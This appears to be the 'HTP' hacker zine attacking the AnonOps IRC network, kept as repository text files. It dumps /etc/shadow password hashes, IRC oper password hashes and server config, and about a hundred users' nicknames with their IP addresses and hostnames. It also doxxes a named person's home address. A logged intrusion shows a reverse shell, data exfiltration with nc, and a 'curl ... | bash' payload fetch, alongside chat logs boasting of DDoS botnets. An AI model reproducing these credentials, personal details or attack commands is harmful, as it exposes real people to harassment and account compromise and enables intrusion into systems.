smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
shitstorm:x:500:500::/home/shitstorm:/bin/bash
anonops:x:501:501::/home/anonops:/bin/bash
owen:x:502:502::/home/owen:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
# IT GETS BETTER!
[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
:: 0x05 ~ 1pS ::
# These were posted on pastebin, but it didnt seem to get as much attention
# as whoever posted it wanted it to get. All these are from a vulnerable
# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
# What a fucking idiot.
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
:: 0x06 ~ l0l sh1t ::
Here's a bit of quotes we found funny.
_ _ _
| | | | (_)
__| | __ _| |__ ___ ___ __ _ _ ___ _ __ ___ __ _ _ __
/ _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \
| (_| | (_| | |_) | (_) | (_) | (_| | | __/ | | | | | (_| | | | |
\__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
__/ |
|___/
<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
because i feel that i have too much else to do ( being an oper and all)
<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
and /kill <nick>
<daboogieman> any attempt by a non-oper to chat to me will be met by instand
gline and/or kill
_
(_)
_ __ _ ___
| '_ \| |/ _ \
| |_) | | __/
| .__/|_|\___|
| |
|_|
<pie>!ban *!*@*
<anon>what the fuck
<pie>its ok i can do whatever i want because im drunk
<pie>it will be fine in the morning
_ _
| | | |
___ __ _| | ___| |__
/ __/ _` | |/ _ \ '_ \
| (_| (_| | | __/ |_) |
\___\__,_|_|\___|_.__/
<Caleb>fuck my vps just got hacked with a ddos attack
<Caleb>morning
<Caleb>hi
<Caleb>:3
<Caleb>have a nice sleep? :3
<Caleb>i had a good sleep
<Caleb>eating my lunch now
<Caleb>ohai
<Caleb>ohai!
<Caleb>ohai :3
<Caleb>my computer seems to be fucking itself at 7000 rpms.
<Caleb> just block the morons
<Caleb>hmmm
<Caleb>lol
<Caleb>sup!
<Caleb>:3
<Caleb>going to sleep for a bit bbl...
<Caleb>How do you hack with a DDOS attack?
<Caleb>my shell just got hit with 77gbps
<Caleb>im gonna destroy them when i find out who did it
<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
@CalebNewz: somehow their hitting my ip table.
_____ _____ _ __
/ _ \ \ /\ / / _ \ '_ \
| (_) \ V V / __/ | | |
\___/ \_/\_/ \___|_| |_|
<owen>FUCK this box doesnt have wget we are screwed then
<owen>[redacted] im fucking zlineing you because you're a movement traitor
<owen>you dont even know who i really am and the connections i have
<owen>i can just call in a favor and get your personal life ruined
<owen>is there young boys here (over 18) who wanna have a chat in pm??
<owen>you HAVE to install unreal to ~/Unreal3.2
_ _____ __
/\ | | |__ \ \ / /
/ \ | |__ __ _ ) \ \_/ /
/ /\ \ | '_ \ / _` | / / \ /
/ ____ \| | | | (_| |/ /_ | |
/_/ \_\_| |_|\__,_|____| |_|
<Aha2Y>if your servers getting DDoSed just mitigate the attack
<Aha2Y>i have this awesome script i found on hackforums
<Aha2Y>it blocks ip addresses
<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
it on my network
<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
so that means its DDoSing me right?
<Aha2Y>i'll use my script of hackforums to block it
____ ____ _ _ _
| _ \ _____ _____ _ _|___ \ / \ | | |
| |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
| __/ (_) \ V V / __/ | / __/ / ___ \| | |
|_| \___/ \_/\_/ \___|_| |_____/_/ \_\_|_|
@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
is deemed SAFE. I said it was online, not "SAFE", dipshit.
@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
That just smacks of gross negligence. Turn in your Guy Fawkes mask.
@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
the provider.
@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
_
_ __ ___ _ __ ___ ___| | ___ ___ _ __
| '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \
| | | __/ | | | | \__ \ | __/ __/ |_) |
|_| \___|_| |_| |_|___/_|\___|\___| .__/
|_|
D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
Names: Rick Bonata
Address 221 FRANKLIN AVE
CUYAHOGA FALLS, OH 44221
<remsleep>i might launch at 666,666
<remsleep>idk yet
<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
<remsleep>it takes time to send orders to 180,000 zombies :p
<remsleep>the time servers being down complicated the scanrio
<remsleep>scenario
<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
<Ian>on average, the typical non-root server is 10mbps
<remsleep>but as far as the world is concerned, i am just a host.
<remsleep>Ian: yes
<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
<Ian>so you are talking about
<Ian>10,000,000mbps
<remsleep>:)
<Ian>10,000gbps
<remsleep>heuheheuhehehe
<Ian>10 terabits
<remsleep>roughly.
<remsleep>plus or minus
<remsleep>it's take years
<remsleep>and constant evasion of law enforcement
<remsleep>i've got a direct line into NCIC via telnet.
<remsleep>:D :D :D
<remsleep>verified i have gov ip's on mah shit
<remsleep>i am going to block ALL government ips
<remsleep>http://www.uaff.info/militarytracking.htm
<remsleep>fyi
<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
2 mill for some ips, i would give fake ips but i would do it for the $$ lol
<remsleep>not the first time i've falsified logs for money ;p
<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
DHCP clients, I was getting radio signals beemed at my house :P
<remsleep>@-@
<remsleep>wonder how many warrants become invalid because of that little job :D
<remsleep>chinanet is connected to me
<remsleep>mother fuckers
<remsleep> If the FBI does come, or whomever for whatever reason, I will have
them on camera with a live feed with a 3G modem backup streaming to one of
my VDSs. I would be unstopable after that, I would sue for false arrest,
kidnapping, conspiracy to each, general fuckery as well as a large sum of
punitive damages.
<anon> Hey
<anon> 221 FRANKLIN AVE
<anon> CUYAHOGA FALLS, OH 4422
<anon> Lucky for you, I'm not in your jurisdiction ;)
<remsleep> So you're saying you're a cop?
<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
Falls Ohio
<remsleep> and my dns whois, falsified as well. :\
<anon> Yeah, ok
<anon> You should probably just /quit
<anon> If you continue to enable terrorist activity, I'll call someone who
DOES have jurisdiction
<remsleep> ..
<remsleep> Really?
<anon> Really.
<remsleep> Dude, call who you wanna call. I could care less.
<anon> Also, seriously?
<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
[remsleep] Memo to ANY Law Enforcement: You are compelled to
leave this network, failure to do so will result in whatever
evidence obtained being after this point will become sealed
and unusable in court. You are tresspasing, you have been warned.
<anon> HAHAHAHAHA
<anon> I've kicked down the doors of file sharers who had similar
notices attached to their servers
:: 0x07 ~ FiL3z ::
We've enclosed some fun files for your viewing pleasure. These are probably
the best part of this dump.
Filename Description
shadow /etc/shadow, self explanatory
oper.db Anope Oper Database
chan.db Anope Channel Database
nick.db Anope NickServ Database
keys.txt AnonOps private ssl key/cert
defaults.conf InspIRCd Conf.
nick.out.txt Human readable NickServ database w/ cracked passwords,
nickname aliases, registration times, seen times, memos (LOL)
chan.out.txt Huamn readable ChanServ database w/ cracked passwords,
access lists, akick lists, badwords, ..etc.
:: 0x08 ~ exit ::
tl;dr JAJA ANONOPS ESTAN MUERTO. (LOL DEAD)
AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
bring Anonymous back to the state it was, but we've burned the abonimation
that took its place to the ground. For that, we are proud. We hope you enjoyed
reading this little 'zine half as much as we enjoyed owning these
pseudo-activitists for the Nth time. We've personally been responsible for
nulling somewhere in the neighborhood of 50 of their servers, and will just
keep dropping them as they put more back up. Ryan Cleary had the right idea,
in trying to get Anons to spread out, but the namefags didn't want to listen.
This time, we can only hope that they do.
VIVA LA CARLOS1337!!!!!
shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
for fighting the good fight.

35830
htp/HTP-4.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1058
htp/HTP-5.txt Normal file
View File

File diff suppressed because it is too large Load Diff

817
htp/HTP-Anonops2.txt Executable file
View File

@ -0,0 +1,817 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
OJOIN FILTER CBAN">
# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
ServerLink Shutdown" vhost="servadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
# Oper List
<oper name="power2all" hash="sha256"
password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
# password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
# password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
# host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
# password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">
<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
uline="yes">
